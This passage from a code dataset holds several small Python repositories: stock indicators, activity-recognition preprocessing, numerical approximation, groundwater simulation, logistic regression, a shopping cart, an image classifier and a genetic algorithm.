values[i][3]\n ema_values.append(close * k + ema_values[-1] * (1 - k))\n return ema_values[-1]\n\"\"\"\n\ndef multiple_csv_to_dataset(test_set_name):\n import os\n ohlcv_histories = 0\n technical_indicators = 0\n next_day_open_values = 0\n for csv_file_path in list(filter(lambda x: x.endswith('daily.csv'), os.listdir('./'))):\n if not csv_file_path == test_set_name:\n print(csv_file_path)\n if type(ohlcv_histories) == int:\n ohlcv_histories, technical_indicators, next_day_open_values, _, _ = csv_to_dataset(csv_file_path)\n else:\n a, b, c, _, _ = csv_to_dataset(csv_file_path)\n ohlcv_histories = np.concatenate((ohlcv_histories, a), 0)\n technical_indicators = np.concatenate((technical_indicators, b), 0)\n next_day_open_values = np.concatenate((next_day_open_values, c), 0)\n\n ohlcv_train = ohlcv_histories\n tech_ind_train = technical_indicators\n y_train = next_day_open_values\n\n ohlcv_test, tech_ind_test, y_test, unscaled_y_test, y_normaliser = csv_to_dataset(test_set_name)\n\n return ohlcv_train, tech_ind_train, y_train, ohlcv_test, tech_ind_test, y_test, unscaled_y_test, y_normaliser\n\"\"\"","repo_name":"shlomitub28/cod-stock-demo","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4921,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
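calc_ema above seeds the average with the window's SMA and then applies the standard recurrence ema_t = k*close_t + (1-k)*ema_{t-1} with k = 2/(1+period). pandas expresses the same recurrence directly (without the SMA seed, so the earliest values differ slightly); a sketch with made-up prices:

import pandas as pd

closes = pd.Series([10.0, 10.5, 10.2, 10.8, 11.0, 10.6])
ema12 = closes.ewm(span=12, adjust=False).mean()  # k = 2 / (span + 1)
macd = (closes.ewm(span=12, adjust=False).mean()
        - closes.ewm(span=26, adjust=False).mean())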
+{"seq_id":"73487787456","text":"import numpy as np\nimport pandas as pd\nfrom scipy import stats\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\n\ndef moving_avg(df, n, step):\n \"\"\"\n moving avg with step size\n (Did not use pandas.rolling since step size not supported.)\n Input:\n df: Input dataframe. First column (index 0) is time stamp.\n n: window length\n step: step size of the moving average\n Return:\n data: 2D array with features, has less number of rows than input df. \n \"\"\"\n T = df.shape[0]\n new_t = range(0, T, step)\n data = np.zeros((len(new_t), df.shape[1]))\n\n for i, t in enumerate(new_t):\n data[i, :] = np.nanmean(df.iloc[t: t + n, :].values, axis=0) # ignore nan when computing mean.\n # discard the last window\n return data[:-1, :]\n\ndef moving_vote_majority(label_df, n, step):\n \"\"\"\n Take majority vote of labels in the moving window.\n Input:\n label_df: dataframe with one column denoting the label stream.\n n: window size.\n step: step size of the moving window\n Return:\n labels: 1D array with labels.\n \"\"\"\n T = label_df.shape[0]\n new_t = range(0, T, step)\n labels = np.zeros((len(new_t)))\n for i, t in enumerate(new_t):\n labels[i] = stats.mode(label_df.iloc[t: t + n].values)[0][0]\n return labels[:-1]\n\ndef fill_missing(training, test, col_threshold, replace):\n \"\"\"\n training: 2D array\n test: 2D array or None. If test is None, only process training data.\n col_threshold: if nan values in one column is greater than col_threshold, the column is ignored.\n replace: True: replace nan value in each row. False: delete the row if it contains nan.\n \"\"\"\n # delete nan columns\n training = training[:, np.sum(np.isnan(training), axis=0) < col_threshold * training.shape[0]]\n if test is not None:\n test = test[:, np.sum(np.isnan(test), axis=0) < col_threshold * test.shape[0]]\n\n # process nans in each row\n if not replace:\n training = training[np.logical_not(np.any(np.isnan(training), axis=1)), :]\n if test is not None:\n test = test[np.logical_not(np.any(np.isnan(test), axis=1)), :]\n else:\n # replace with previous values\n for i in range(0, training.shape[0]):\n if i == 0:\n training[i, np.isnan(training[i, :])] = 0.0\n else:\n training[i, np.isnan(training[i, :])] = training[i - 1, np.isnan(training[i, :])]\n # remove the column with zero variance\n var_train = np.var(training, axis=0)\n logical_mask = var_train > 0\n training = training[:, logical_mask]\n \n if test is not None:\n test = test[:, logical_mask]\n mean_train = np.mean(training, axis=0)\n for i in range(0, test.shape[0]):\n if i == 0:\n # fill in the mean of training data\n test[i, np.isnan(test[i, :])] = mean_train[np.isnan(test[i, :])]\n else:\n test[i, np.isnan(test[i, :])] = test[i - 1, np.isnan(test[i, :])]\n \n return training, test\n\ndef extract_feature_per_person(person):\n \"\"\"\n For each person in the dataset, smooth data, fill missing values and perform dimension reduction.\n Use ADL1~3 for training, ADL4~5 for testing.\n Return:\n train_reduced: [n_train, n_features]. Sequence of training feature vectors.\n test_reduced: [n_test, n_features]. Sequence of testing feature vectors.\n train_labels: [n_train, ]. Sequence of training activity labels in {0, 101, 102, 103, 104, 105}\n test_labels: [n_test, ]. Sequence of testing activity labels in {0, 101, 102, 103, 104, 105}\n train_len: length of subsequences in training data. sum(train_len) = n_train.\n test_len: length of subsequences in testing data. 
sum(test_len) = n_test.\n    \"\"\"\n    # Load data\n    sadl_n = []\n    for n in range(1, 6):\n        sadl_n.append(pd.read_table('data/S%d-ADL%d.dat' % (person, n), sep='\\s+', header=None, dtype=float))\n\n    # Smooth data, time: col 0, features: col 1~36, labels: col 244\n    winsize = 15\n    stepsize = 8\n    # train data\n    train_sample = np.empty((0, 36))\n    train_labels = np.empty((0))\n    train_len = []\n    for i in range(0, 3):\n        features = moving_avg(sadl_n[i].iloc[:, 1:37], winsize, stepsize)\n        labels = moving_vote_majority(sadl_n[i].iloc[:, 244], winsize, stepsize)\n        train_sample = np.concatenate((train_sample, features), axis=0)\n        train_len.append(features.shape[0])\n        train_labels = np.concatenate((train_labels, labels))\n    train_len = np.array(train_len)\n    # test data\n    test_sample = np.empty((0, 36))\n    test_labels = np.empty((0))\n    test_len = []\n    for i in range(3, 5):\n        features = moving_avg(sadl_n[i].iloc[:, 1:37], winsize, stepsize)\n        labels = moving_vote_majority(sadl_n[i].iloc[:, 244], winsize, stepsize)\n        test_sample = np.concatenate((test_sample, features), axis=0)\n        test_len.append(features.shape[0])\n        test_labels = np.concatenate((test_labels, labels))\n    test_len = np.array(test_len)\n\n    # Fill missing values\n    col_threshold = 0.5\n    train, test = fill_missing(train_sample, test_sample, col_threshold, True)\n\n    # Normalize features: fit the scaler on the training data only and reuse\n    # it for the test data, to avoid leakage between the two splits\n    scaler = StandardScaler()  # center to mean and normalize to unit variance\n    train_normalized = scaler.fit_transform(train)\n    test_normalized = scaler.transform(test)\n\n    # Dimension reduction\n    pca = PCA()\n    pca.fit(train_normalized)\n    var_thres = 0.95  # keep components up to 95% total variance\n    n_comp = (pca.explained_variance_ratio_.cumsum() < var_thres).sum() + 1\n\n    pca_train = PCA(n_components=n_comp)\n    train_reduced = pca_train.fit_transform(train_normalized)\n    test_reduced = pca_train.transform(test_normalized)\n\n    return train_reduced, test_reduced, train_labels, test_labels, train_len, test_len\n","repo_name":"flian2/human-activity-recognition-hmm","sub_path":"clean_data.py","file_name":"clean_data.py","file_ext":"py","file_size_in_byte":5916,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"79"}
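scikit-learn can also pick the component count from a variance target directly: passing a float in (0, 1) as n_components keeps just enough components to reach that explained-variance ratio, replacing the manual cumsum bookkeeping above. A sketch, with train_normalized/test_normalized as in extract_feature_per_person:

from sklearn.decomposition import PCA

pca = PCA(n_components=0.95)  # keep components up to 95% total variance
train_reduced = pca.fit_transform(train_normalized)
test_reduced = pca.transform(test_normalized)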
+{"seq_id":"15105360905","text":"from choice import *\r\nfrom graphs import graph\r\nfrom algorithms import *\r\n\r\nif __name__ == '__main__':\r\n    chosen_workflow = workflow()\r\n    f = fun()\r\n    d, e = int, float  # placeholders; one of them is set in a branch below\r\n    if chosen_workflow == 1:\r\n        d = polynomial_degree()\r\n    else:\r\n        e = approximation_error()\r\n    n = nodes_number()\r\n    start, end = interval()\r\n    coefficient = []\r\n    weights, roots = laguerre(n)\r\n\r\n    if chosen_workflow == 1:\r\n        for i in range(0, d + 1):\r\n            coefficient.append(lam(f, n, i, weights, roots))\r\n        print(\"The approximation error is: \" + str(error(roots, weights, f, coefficient, n, d)))\r\n\r\n    else:\r\n        d = 1\r\n        while True:\r\n            coefficient = []\r\n            for i in range(0, d + 1):\r\n                coefficient.append(lam(f, n, i, weights, roots))\r\n            if error(roots, weights, f, coefficient, n, d) <= e:\r\n                print(f\"The expected error was achieved for a polynomial of degree: {d}\")\r\n                break\r\n            else:\r\n                d += 1\r\n\r\n    calculated_x, calculated_y, real_x, real_y = [], [], [], []\r\n    h = (end - start) / 100\r\n    while start <= end:\r\n        result = 0.0\r\n        for j in range(0, d + 1):\r\n            result += coefficient[j] * laguerre_polynomial(j, start)\r\n        calculated_x.append(start)\r\n        calculated_y.append(result)\r\n        real_x.append(start)\r\n        real_y.append(f(start))\r\n        start += h\r\n\r\n    graph(calculated_x, calculated_y, real_x, real_y)\r\n","repo_name":"stepniaczky/NumericalMethods","sub_path":"laguerre_polynomials_approximation/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"20228097454","text":"import numpy as np\nimport flopy\nimport numpy as np\nimport flopy.utils.binaryfile as bf\nimport matplotlib.pyplot as plt\n\n\nLx = 2.0\nLz = 1.0\nnlay = 50\nnrow = 1\nncol = 100\ndelr = Lx / ncol\ndelc = 1.0\ndelv = Lz / nlay\nhenry_top = 1.0\nhenry_botm = np.linspace(henry_top - delv, 0.0, nlay)\nqinflow = 5.702 # m3/day\ndmcoef = 0.57024 # m2/day Could also try 1.62925 as another case of the Henry problem\nhk = 864.0 # m/day\n\nmodelname = \"henry\"\nswt = flopy.seawat.Seawat(modelname, exe_name=r\"C:\\Users\\ccl124\\bin\\swt_v4x64.exe\")\nprint(swt.namefile)\n\nipakcb = 53\n\ndis = flopy.modflow.ModflowDis(\n swt,\n nlay,\n nrow,\n ncol,\n nper=1,\n delr=delr,\n delc=delc,\n laycbd=0,\n top=henry_top,\n botm=henry_botm,\n perlen=1.5,\n nstp=15,\n)\n\n# Variables for the BAS package\nibound = np.ones((nlay, nrow, ncol), dtype=np.int32)\nibound[:, :, -1] = -1\n\nbas = flopy.modflow.ModflowBas(swt, ibound, 0)\n\nlpf = flopy.modflow.ModflowLpf(swt, hk=hk, vka=hk, ipakcb=ipakcb)\n\npcg = flopy.modflow.ModflowPcg(swt, hclose=1.0e-8)\n\noc = flopy.modflow.ModflowOc(\n swt,\n stress_period_data={(0, 0): [\"save head\", \"save budget\"]},\n compact=True,\n)\n\nitype = flopy.mt3d.Mt3dSsm.itype_dict()\nwel_data = {}\nssm_data = {}\nwel_sp1 = []\nssm_sp1 = []\nfor k in range(nlay):\n wel_sp1.append([k, 0, 0, qinflow / nlay])\n ssm_sp1.append([k, 0, 0, 0.0, itype[\"WEL\"]])\n ssm_sp1.append([k, 0, ncol - 1, 35.0, itype[\"BAS6\"]])\nwel_data[0] = wel_sp1\nssm_data[0] = ssm_sp1\nwel = flopy.modflow.ModflowWel(swt, stress_period_data=wel_data, ipakcb=ipakcb)\n\nbtn = flopy.mt3d.Mt3dBtn(\n swt,\n nprs=-5,\n prsity=0.35,\n sconc=35.0,\n ifmtcn=0,\n chkmas=False,\n nprobs=10,\n nprmas=10,\n dt0=0.001,\n\n)\nadv = flopy.mt3d.Mt3dAdv(swt, mixelm=0)\ndsp = flopy.mt3d.Mt3dDsp(swt, al=0.0, trpt=1.0, trpv=1.0, dmcoef=dmcoef)\ngcg = flopy.mt3d.Mt3dGcg(swt, iter1=500, mxiter=1, isolve=1, cclose=1e-7)\nssm = flopy.mt3d.Mt3dSsm(swt, stress_period_data=ssm_data)\n\nvdf = flopy.seawat.SeawatVdf(\n swt,\n iwtable=0,\n densemin=0,\n densemax=0,\n denseref=1000.0,\n denseslp=0.7143,\n firstdt=1e-3,\n)\n\nswt.write_input()\n\nsuccess, buff = swt.run_model(silent=True, report=True)\nif not success:\n raise Exception(\"SEAWAT did not terminate normally.\")\n\nucnobj = bf.UcnFile(\"MT3D001.UCN\", model=swt)\ntimes = ucnobj.get_times()\nconcentration = ucnobj.get_data(totim=times[-1])\n\ncbbobj = bf.CellBudgetFile(\"henry.cbc\")\ntimes = cbbobj.get_times()\nqx = cbbobj.get_data(text=\"flow right face\", totim=times[-1])[0]\nqy = np.zeros((nlay, nrow, ncol), dtype=float)\nqz = cbbobj.get_data(text=\"flow lower face\", totim=times[-1])[0]\n\nfig = plt.figure(figsize=(12,9))\nax = fig.add_subplot(1, 1, 1, aspect=\"equal\")\npmv = flopy.plot.PlotCrossSection(model=swt, ax=ax, line={\"row\": 0})\narr = pmv.plot_array(concentration)\npmv.plot_vector(qx, qy, -qz, color=\"white\", kstep=3, hstep=3)\nplt.colorbar(arr, shrink=0.5, ax=ax)\nax.set_title(\"Simulated Concentrations\");\nplt.show()\n\nheadobj = bf.HeadFile(\"henry.hds\")\ntimes = headobj.get_times()\nhead = headobj.get_data(totim=times[-1])\n\nfig = plt.figure(figsize=(12, 9))\nax = fig.add_subplot(1, 1, 1, aspect=\"equal\")\npmv = flopy.plot.PlotCrossSection(model=swt, ax=ax, line={\"row\": 0})\narr = pmv.plot_array(head)\ncontours = pmv.contour_array(head, colors=\"white\")\nax.clabel(contours, fmt=\"%2.2f\")\nplt.colorbar(arr, shrink=0.5, ax=ax)\nax.set_title(\"Simulated 
Heads\");\nplt.show()","repo_name":"connorcleary/code_cdrive","sub_path":"swgw/scripts/henry_seawat.py","file_name":"henry_seawat.py","file_ext":"py","file_size_in_byte":3405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"13480875285","text":"from .Describer import Describer\n\n\nclass GeneralDescriber(Describer):\n TEMP_SKEW_THRESHOLD = 0.4\n\n def get_section_header(self):\n return \"General frame info\"\n\n def describe(self, df):\n messages = [f\"Shape: {df.shape}\"]\n\n # NULLS\n columns_with_nulls = df.columns[df.isna().any()].array.to_numpy()\n if len(columns_with_nulls) > 0:\n messages.append(\n f\"Columns with one or more null values: {columns_with_nulls}\"\n )\n\n return messages\n","repo_name":"jammerware/pandashape","sub_path":"src/pandashape/describers/GeneralDescriber.py","file_name":"GeneralDescriber.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"12401111979","text":"from functions1 import sigmoid\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndata = [[2, 0], [4, 0], [6, 0], [8, 1], [10, 1], [12, 1], [14, 1]]\n\nx_data = [i[0] for i in data]\ny_data = [i[1] for i in data]\n\nplt.scatter(x_data, y_data)\nplt.xlim(0, 15)\nplt.ylim(-0.1, 1.1)\n# plt.show()\n\na, b = 0, 0\nlr = 0.05\n\nfor i in range(2001):\n    # use distinct loop names so the x_data/y_data lists are not shadowed\n    for x, y in data:\n        a_diff = x * (sigmoid(a * x + b) - y)\n        b_diff = sigmoid(a * x + b) - y\n\n        a = a - (lr * a_diff)\n        b = b - (lr * b_diff)\n\n    if i % 100 == 0:\n        print(f'epoch={i}, slope={a:.04f}, intercept={b:.04f}')\n\nplt.scatter(x_data, y_data)\nplt.xlim(0, 15)\nplt.ylim(-0.1, 1.1)\nx_range = np.arange(0, 15, 0.1)\nplt.plot(x_range, np.array([sigmoid(a * x + b) for x in x_range]))\nplt.show()\n","repo_name":"kimhyeongju/coding_practice","sub_path":"DeepLearning/logisticRegression.py","file_name":"logisticRegression.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
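A vectorized sketch of the same fit: one averaged gradient step per epoch over all samples instead of a step per sample, so it converges slightly differently and the constants below are assumptions rather than a drop-in replacement:

import numpy as np

data = [[2, 0], [4, 0], [6, 0], [8, 1], [10, 1], [12, 1], [14, 1]]
xs = np.array([d[0] for d in data], dtype=float)
ys = np.array([d[1] for d in data], dtype=float)

a, b, lr = 0.0, 0.0, 0.05
for epoch in range(2001):
    preds = 1 / (1 + np.exp(-(a * xs + b)))  # sigmoid over every sample at once
    a -= lr * np.mean((preds - ys) * xs)     # mean gradient w.r.t. the slope
    b -= lr * np.mean(preds - ys)            # mean gradient w.r.t. the intercept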
+{"seq_id":"15195198838","text":"from transaction import Transactions\n\n\nif __name__ == \"__main__\":\n    transaction = Transactions()\n\n    print(f\"Hello User {transaction.id}\")\n    print(\"Please add some items\")\n\n    item_list = []\n    while True:\n        item_name = input(\"Item Name :\")\n        if item_name[:1].isdigit():\n            print(\"You cannot fill the item beginning with a digit\")\n            continue\n\n        count = input(\"Count :\")\n        try:\n            count = int(count)\n        except ValueError:\n            print(\"You cannot fill count with alphabets\")\n            continue\n\n        price = input(\"Price :\")\n        try:\n            price = int(price)\n        except ValueError:\n            print(\"You cannot fill price with alphabets\")\n            continue\n\n        # build a fresh dict each round so earlier entries are not overwritten\n        item = {\n            item_name: {\n                \"count\": count,\n                \"price\": price\n            }\n        }\n\n        item_list.append(item)\n        print(f\"Item ={item_name}\")\n        print(f\"Count ={count}\")\n        print(f\"Price ={price}\")\n\n        print(item_list)\n\n        if input(\"add again ?(y/n)\") != \"y\":\n            transaction.add_items(items=item_list)\n            break\n        else:\n            continue\n\n    while True:\n        next_step = int(input(\n            \"\"\"\n            What do you want to do next?\n            [1] edit item\n            [2] delete item\n            [3] reset cart\n            [4] finish\n            \"\"\"\n        ))\n\n        if next_step == 1:\n            transaction.show_cart()\n            name = input(\"What item do you want to edit ?\")\n            if transaction.check_list_item(item_name=name):\n                item_name = input(\"Item Name :\")\n                count = int(input(\"Count :\"))\n                price = int(input(\"Price :\"))\n\n                print(f\"Item ={item_name}\")\n                print(f\"Count ={count}\")\n                print(f\"Price ={price}\")\n\n                transaction.edit_item(name=name, item=item_name, count=count, price=price)\n\n        if next_step == 2:\n            dele = input(\"What item do you want to delete ?\")\n            transaction.delete_item(item=dele)\n\n        if next_step == 3:\n            print(\"Reset Cart\")\n            transaction.reset_cart()\n\n        if next_step == 4:\n            print(\"Finish Process\")\n            transaction.show_cart()\n            break","repo_name":"AlifvianM/Pacmann-SuperStoreApp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"5223541074","text":"\"\"\"\nWrite a function that takes 2 non-empty arrays of integers and returns an array of 2 numbers (one from each array) whose absolute difference is the smallest. The number in the first array should appear first in the return array.\nTC: O(nlog(n) + mlog(m)), where n is the length of array1 and m is the length of array2\nSC: O(1)\n\"\"\"\ndef smallest_difference(array1, array2):\n    array1.sort(), array2.sort()\n\n    smallest_diff, pair = float('inf'), []\n    p1 = p2 = 0\n\n    while p1 < len(array1) and p2 < len(array2):\n        diff = abs(array1[p1] - array2[p2])\n        if diff < smallest_diff:\n            smallest_diff, pair = diff, [array1[p1], array2[p2]]\n\n        # advance the pointer sitting at the smaller value; equal values\n        # give a difference of 0, which cannot be beaten\n        if array1[p1] < array2[p2]:\n            p1 += 1\n        elif array2[p2] < array1[p1]:\n            p2 += 1\n        else:\n            return [array1[p1], array2[p2]]\n\n    return pair\n\n\nif __name__ == \"__main__\":\n    # print(smallest_difference(\n    #     [-1, 5, 10, 20, 28, 3],\n    #     [26, 134, 135, 15, 17]\n    # ))\n\n    # print(smallest_difference(\n    #     [-1, 5, 10, 20, 3],\n    #     [26, 134, 135, 15, 17]\n    # ))\n\n    # print(smallest_difference(\n    #     [240, 124, 86, 111, 2, 84, 954, 27, 89],\n    #     [1, 3, 954, 19, 8]\n    # ))\n\n    print(smallest_difference(\n        [10, 1000, 9124, 2142, 59, 24, 596, 591, 124, -123, 530],\n        [-1441, -124, -25, 1014, 1500, 660, 410, 245, 530]\n    ))\n","repo_name":"mattdepillis/python_dsa","sub_path":"ae_questions/arrays/medium/smallest_difference/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
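An O(n*m) brute-force cross-check is handy for validating the two-pointer result on random inputs; a minimal sketch:

def smallest_difference_bruteforce(array1, array2):
    # scan every cross pair; the first array's element stays first in the result
    return min(
        ([x, y] for x in array1 for y in array2),
        key=lambda p: abs(p[0] - p[1]),
    )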
+{"seq_id":"22681412253","text":"# SETUP\r\nimport numpy as np\r\nimport plotly.express as px\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport tensorflow as tf\r\nfrom sklearn.metrics import accuracy_score, classification_report\r\n\r\ntrain_dir = r'C:\\Users\\ADMIN\\Downloads\\XLA\\Data\\dataset2-master\\dataset2-master\\images\\TRAIN'\r\ntest_dir = r'C:\\Users\\ADMIN\\Downloads\\XLA\\Data\\dataset2-master\\dataset2-master\\images\\TEST'\r\n\r\n# LOAD IMAGE DATA\r\n# CREATE GENERATORS\r\ntrain_gen = tf.keras.preprocessing.image.ImageDataGenerator(\r\n    preprocessing_function=tf.keras.applications.mobilenet_v2.preprocess_input,\r\n    validation_split=0.2\r\n)\r\ntest_gen = tf.keras.preprocessing.image.ImageDataGenerator(\r\n    preprocessing_function=tf.keras.applications.mobilenet_v2.preprocess_input\r\n)\r\n\r\n# FLOW IMAGES FROM THE DIRECTORIES\r\ntrain_images = train_gen.flow_from_directory(  # 80% of the training directory goes here\r\n    directory=train_dir,\r\n    target_size=(224, 224),\r\n    color_mode='rgb',\r\n    class_mode='categorical',\r\n    batch_size=32,\r\n    shuffle=True,\r\n    seed=42,\r\n    subset='training'\r\n)\r\nval_images = train_gen.flow_from_directory(  # the other 20% goes here\r\n    directory=train_dir,\r\n    target_size=(224, 224),\r\n    color_mode='rgb',\r\n    class_mode='categorical',\r\n    batch_size=32,\r\n    shuffle=False,\r\n    seed=42,\r\n    subset='validation'\r\n)\r\ntest_images = test_gen.flow_from_directory(\r\n    directory=test_dir,\r\n    target_size=(224, 224),\r\n    color_mode='rgb',\r\n    class_mode='categorical',\r\n    batch_size=32,\r\n    shuffle=False,\r\n    seed=42\r\n)\r\n\r\n# Build pretrained model\r\npretrained_model = tf.keras.applications.MobileNetV2(\r\n    input_shape=(224, 224, 3),\r\n    include_top=False,\r\n    weights='imagenet',\r\n    pooling='avg'\r\n)\r\npretrained_model.trainable = False\r\n\r\n# Build classification model\r\ninputs = pretrained_model.input\r\nx = tf.keras.layers.Dense(128, activation='relu')(pretrained_model.output)\r\noutputs = tf.keras.layers.Dense(4, activation='softmax')(x)\r\n\r\nmodel = tf.keras.Model(inputs=inputs, outputs=outputs)\r\n\r\nmodel.compile(\r\n    optimizer='adam',\r\n    loss='categorical_crossentropy',\r\n    metrics=['accuracy']\r\n)\r\nprint(model.summary())\r\n\r\n# Training\r\nhistory = model.fit(\r\n    train_images,\r\n    validation_data=val_images,\r\n    epochs=30,\r\n    callbacks=[\r\n        tf.keras.callbacks.EarlyStopping(\r\n            monitor='val_loss',\r\n            patience=3,\r\n            restore_best_weights=True\r\n        )\r\n    ]\r\n)\r\n\r\nfig = px.line(\r\n    history.history,\r\n    y=['loss', 'val_loss'],\r\n    labels={'index': \"Epoch\", \"value\": \"Loss\"},\r\n    title=\"Training and Validation Loss Over Time\"\r\n)\r\nfig.show()\r\n\r\n# RESULTS\r\nCLASS_NAMES = list(train_images.class_indices.keys())\r\n\r\npredictions = np.argmax(model.predict(val_images), axis=1)\r\n\r\nacc = accuracy_score(val_images.labels, predictions)\r\ncm = tf.math.confusion_matrix(val_images.labels, predictions)\r\nclr = classification_report(val_images.labels, predictions, target_names=CLASS_NAMES)\r\n\r\nprint(\"Validation Accuracy: {:.3f}%\".format(acc * 100))\r\n\r\nplt.figure(figsize=(8, 8))\r\nsns.heatmap(cm, annot=True, fmt='g', vmin=0, cmap='Blues', cbar=False)\r\nplt.xticks(ticks=np.arange(4) + 0.5, labels=CLASS_NAMES)\r\nplt.yticks(ticks=np.arange(4) + 0.5, labels=CLASS_NAMES)\r\nplt.xlabel(\"Predicted\")\r\nplt.ylabel(\"Actual\")\r\nplt.title(\"Confusion Matrix\")\r\nplt.show()\r\n\r\nprint(\"Classification Report:\\n----------------------\\n\", clr)\r\n\r\nmodel.save('model.h5')","repo_name":"HuynhQuocDan/Code_Final_Report_AI","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":3461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"72364285056","text":"\n# heuristic: tim ra ket noi tieu hao nang luong lon nhat\n# GA: tim ra ca the co tieu hao nang luong nho nhat\n\nimport random, time, os, sys\nlib_path = os.path.abspath(os.path.join('..'))\nsys.path.append(lib_path)\n\nfrom .heuristic import *\n\n\nGEN = 100\nCP = 0.8\nMP = 0.1\nNUM_OF_INDIVIDUALS = 100\nTERMINATE = 30\nalpha = 0.5\n\ndef random_init_individual(num_relay):\n \"Initial individual with any num of relay\"\n indi = []\n Y = random.randint(1, num_relay)\n xs = Y/num_relay\n count_relay = 0\n for i in range(0, num_relay):\n xx = random.random()\n if xx < xs:\n indi.append(1)\n else:\n indi.append(0)\n return indi\n\ndef count_current_relay(individual):\n sum = 0\n for g in individual:\n if g == 1:\n sum += 1\n return sum\n\n# mom and dad instead of parent1 and parent2 =)\ndef cross(mom, dad):\n num_relay = len(mom)\n mid = random.randint(0, num_relay-1)\n child1 = mom[:mid] + dad[mid:]\n child2 = dad[:mid] + mom[mid:]\n return child1, child2\n\n\ndef mutate(original):\n fake = original[:]\n ll = len(fake)\n count1 = 0\n count2 = 0\n id1 = random.randint(0, ll-1)\n while fake[id1] == 0:\n count1 += 1\n id1 = random.randint(0, ll-1)\n if count1 >= 2*ll:\n break\n id2 = random.randint(0, ll-1)\n while fake[id2] == 1:\n count2 += 1\n id2 = random.randint(0, ll-1)\n if count2 >= 2*ll:\n break\n fake[id1], fake[id2] = fake[id2], fake[id1]\n return fake\n\ndef normalize_loss(indi):\n if indi[1].loss(alpha) < 0:\n return float(\"inf\")\n else:\n return 10000*indi[1].loss(alpha) + indi[1].total_tranmission_loss()\n\n# def sort(individuals):\n# ll = len(individuals)\n# new_indis = individuals[:]\n# for i in range(len(individuals)):\n# for j in range(i+1, len(individuals)):\n# if new_indis[i][1].loss(alpha) > new_indis[j][1].loss(alpha):\n# new_indis[i], new_indis[j] = new_indis[j], new_indis[i]\n# elif new_indis[i][1].loss(alpha) == new_indis[j][1].loss(alpha):\n# if new_indis[i][1].total_tranmission_loss() > new_indis[j][1].total_tranmission_loss():\n# new_indis[i], new_indis[j] = new_indis[j], new_indis[i]\n# return new_indis\n\ndef GA(inp: WusnInput) -> int:\n # Khoi tao quan the\n individuals = []\n\n # Cac ca the da duoc tinh toan\n calculated = {}\n\n for i in range (0, NUM_OF_INDIVIDUALS):\n indi = random_init_individual(inp.num_of_relays)\n out = heuristic(inp, indi)\n \n calculated[str(indi)] = out\n individuals.append([indi, out])\n\n print(individuals[0])\n \n count_stable = 0\n max_c = individuals[0][1].loss(alpha)\n prev_max = individuals[0][1].loss(alpha)\n\n # Iterate through generations\n for it in range(0, GEN):\n start = time.time()\n none = 0\n not_none = 0\n # Crossover and mutation\n for id1 in range(0, NUM_OF_INDIVIDUALS):\n id2 = 0\n xx = random.random()\n if xx < CP:\n id2 = random.randint(0, NUM_OF_INDIVIDUALS-1)\n while id2 == id1:\n id2 = random.randint(0, NUM_OF_INDIVIDUALS-1)\n son, daughter = cross(individuals[id1][0], individuals[id2][0])\n\n if str(son) in calculated:\n out1 = calculated[str(son)]\n else:\n s = time.time()\n out1 = heuristic(inp, son)\n t = time.time()\n \n if str(daughter) in calculated:\n out2 = calculated[str(daughter)]\n else:\n # s = time.time()\n out2 = heuristic(inp, daughter)\n # t = time.time()\n\n if out1.mapping == {}:\n none += 1\n else: \n not_none += 1\n if out2.mapping == {}:\n none += 1\n else:\n not_none += 1\n\n individuals.append([son, out1])\n individuals.append([daughter, out2])\n\n xx2 = random.random()\n if xx2 < MP:\n grand_child1 = mutate(son)\n grand_child2 = mutate(daughter)\n 
m_out1 = heuristic(inp, grand_child1)\n m_out2 = heuristic(inp, grand_child2)\n\n if m_out1.mapping == {}:\n none += 1\n else:\n not_none += 1\n if m_out2.mapping == {}:\n none += 1\n else: \n not_none += 1\n\n individuals.append([grand_child1, m_out1])\n individuals.append([grand_child2, m_out2])\n\n individuals2 = sorted(individuals, key=normalize_loss)\n # individuals2 = sort(individuals)\n individuals = individuals2[:NUM_OF_INDIVIDUALS-1] \n individuals.append(individuals2[-1])\n if individuals[0][1].loss(alpha) < max_c:\n max_c = individuals[0][1].loss(alpha)\n if individuals[0][1].loss(alpha) == prev_max:\n count_stable += 1\n else:\n count_stable = 0\n if count_stable == TERMINATE:\n print(\"TERMINATE\")\n break\n prev_max = individuals[0][1].loss(alpha)\n end = time.time()\n print(\"none: %d, not_none: %d\" % (none, not_none))\n print(\"Gen: %d, time: %fs, min: %f %f %f\" % (it, end - start, len(individuals[0][1].used_relays), individuals[0][1].loss(alpha), individuals[NUM_OF_INDIVIDUALS-1][1].loss(alpha)))\n # print(max_c)\n return individuals[0]\n\n# TODO: add a condition for whether an SN and an RN can connect to each other, by adding sn and rn radii\n","repo_name":"duymanh96w/WusnNewModel","sub_path":"GAwHeuristic/GA.py","file_name":"GA.py","file_ext":"py","file_size_in_byte":5873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
